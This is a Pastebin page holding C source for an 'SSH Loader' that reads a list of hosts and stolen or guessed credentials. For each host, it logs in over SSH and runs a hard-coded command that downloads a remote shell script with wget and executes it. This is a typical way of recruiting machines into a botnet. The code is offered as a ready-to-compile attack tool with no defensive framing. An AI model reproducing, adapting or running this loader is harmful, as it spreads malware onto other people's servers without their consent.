API tools faq
paste
Advertisement
sighting

SSH Loader

sighting
Jan 1st, 2019
410
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.03 KB | None | 0 0
raw download clone embed print report
  1. /* made by @netflooding
  2. yum install libssh -y
  3.  
  4. compile: gcc -o loader loader.c -lssh
  5. compile with debug: gcc -o loader loader.c -lssh -DDEBUG
  6. */
  7. #include <stdio.h>
  8. #include <ctype.h>
  9. #include <stdlib.h>
  10. #include <string.h>
  11. #include <sys/types.h>
  12. #include <libssh/libssh.h>
  13.  
  14. char *payload = "wget http://1.1.1.1/bins.sh -O blade.sh && chmod 777 blade.sh; sh blade.sh";
  15. #define INFO "(\x1b[33m%s\x1b[37m)"
  16. #define ERROR "(\x1b[31m?\x1b[37m)"
  17. #define FAILED "(\x1b[31m%s\x1b[37m)"
  18. #define SUCCESS "(\x1b[32m+\x1b[37m)"
  19.  
  20. void Trim(char *str)
  21. {
  22. int i;
  23. int begin = 0;
  24. int end = strlen(str) - 1;
  25. while (isspace(str[begin])) begin++;
  26. while ((end >= begin) && isspace(str[end])) end--;
  27. for (i = begin; i <= end; i++) str[i - begin] = str[i];
  28. str[i - begin] = '\0';
  29. }
  30.  
  31. void free_channel(ssh_channel channel) {
  32. ssh_channel_send_eof(channel);
  33. ssh_channel_close(channel);
  34. ssh_channel_free(channel);
  35. }
  36.  
  37. void free_session(ssh_session session) {
  38. ssh_disconnect(session);
  39. ssh_free(session);
  40. }
  41.  
  42. void exploit(char *host, int port, char *username, char *password)
  43. {
  44. printf("(\x1b[33m!\x1b[37m) Attempting to exploit %s:%d\n", host, port);
  45. int rc;
  46. int statement = 0;
  47. char buffer[1024];
  48. ssh_session session;
  49. ssh_channel channel;
  50. unsigned int nbytes;
  51.  
  52. start:
  53. switch(statement)
  54. {
  55. case 0:
  56. {
  57. #ifdef DEBUG
  58. printf(INFO" Creating secure shell session...\n", host);
  59. #endif
  60. session = ssh_new();
  61. if (session == NULL)
  62. {
  63. #ifdef DEBUG
  64. printf(FAILED" Failed to create secure shell session...\n", host);
  65. #endif
  66. goto end;
  67. }
  68.  
  69. ssh_options_set(session, SSH_OPTIONS_HOST, host);
  70. ssh_options_set(session, SSH_OPTIONS_PORT, &port);
  71. #ifdef DEBUG
  72. printf(INFO" Setting username -> \x1b[34m%s\x1b[37m\n", host, username);
  73. #endif
  74. ssh_options_set(session, SSH_OPTIONS_USER, username);
  75.  
  76. #ifdef DEBUG
  77. printf(INFO" Connecting...\n", host);
  78. #endif
  79. rc = ssh_connect(session);
  80. if (rc != SSH_OK)
  81. {
  82. #ifdef DEBUG
  83. printf(FAILED" Failed to connect to host...\n", host);
  84. #endif
  85. goto end;
  86. }
  87.  
  88. #ifdef DEBUG
  89. printf(INFO" Sending password -> \x1b[35m%s\x1b[37m\n", host, password);
  90. #endif
  91. rc = ssh_userauth_password(session, NULL, password);
  92. if (rc != SSH_AUTH_SUCCESS)
  93. {
  94. #ifdef DEBUG
  95. printf(FAILED" Incorrect credentials...\n", host);
  96. #endif
  97. goto end;
  98. }
  99.  
  100. channel = ssh_channel_new(session);
  101. if (channel == NULL) exit(-1);
  102.  
  103. #ifdef DEBUG
  104. printf(INFO" Opening shell...\n", host);
  105. #endif
  106. rc = ssh_channel_open_session(channel);
  107. if (rc != SSH_OK)
  108. {
  109. #ifdef DEBUG
  110. printf(FAILED" Failed to open shell...\n", host);
  111. #endif
  112. goto end;
  113. }
  114.  
  115. #ifdef DEBUG
  116. printf(INFO" Sending payload...\n", host);
  117. #endif
  118. char cmd[60];
  119. snprintf(cmd, sizeof(cmd), "%s; echo 'ssh_sent_payload'", payload);
  120. rc = ssh_channel_request_exec(channel, cmd);
  121. if(rc != SSH_OK)
  122. {
  123. #ifdef DEBUG
  124. printf(FAILED" Failed to send payload...\n", host);
  125. #endif
  126. goto end;
  127. }
  128.  
  129. sleep(0.6);
  130. nbytes = ssh_channel_read(channel, buffer, sizeof(buffer), 0);
  131. while (nbytes > 0)
  132. {
  133. if(strstr(buffer, "ssh_sent_payload"))
  134. {
  135. printf("(\x1b[32m%s\x1b[37m) Sent payload!\n", host);
  136. break;
  137. }
  138. nbytes = ssh_channel_read(channel, buffer, sizeof(buffer), 0);
  139. }
  140. }
  141. break;
  142. }
  143.  
  144. end:
  145. free_channel(channel);
  146. free_session(session);
  147. return;
  148. }
  149.  
  150. int main(int argc, char **argv)
  151. {
  152. char buf[512];
  153. if(argc > 2 || argc < 2)
  154. {
  155. printf(ERROR" Usage: %s <list>\n", argv[0]);
  156. exit(0);
  157. }
  158. FILE *srvlist = fopen(argv[1], "r");
  159. if(srvlist == NULL)
  160. {
  161. printf("[\x1b[31m-\x1b[37m] Failed to open given list (\x1b[33m%s\x1b[37m)\n", argv[1]);
  162. exit(0);
  163. }
  164. while(fgets(buf, sizeof(buf) - 1, srvlist))
  165. {
  166. if(strlen(buf) < 3 || buf == NULL)
  167. break;
  168. Trim(buf);
  169. char *conn = strtok(buf, " ");
  170. char details[100];
  171. snprintf(details, sizeof(details), "%s", conn+strlen(conn)+1);
  172. char *ip = strtok(conn, ":");
  173. int port = atoi(ip+strlen(ip)+1);
  174. char *user = strtok(details, ":");
  175. char pass[30];
  176. snprintf(pass, sizeof(pass), "%s", user+strlen(user)+1);
  177. if(!(fork()))
  178. {
  179. exploit(ip, port, user, pass);
  180. exit(0);
  181. }
  182. }
  183. return 0;
  184. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!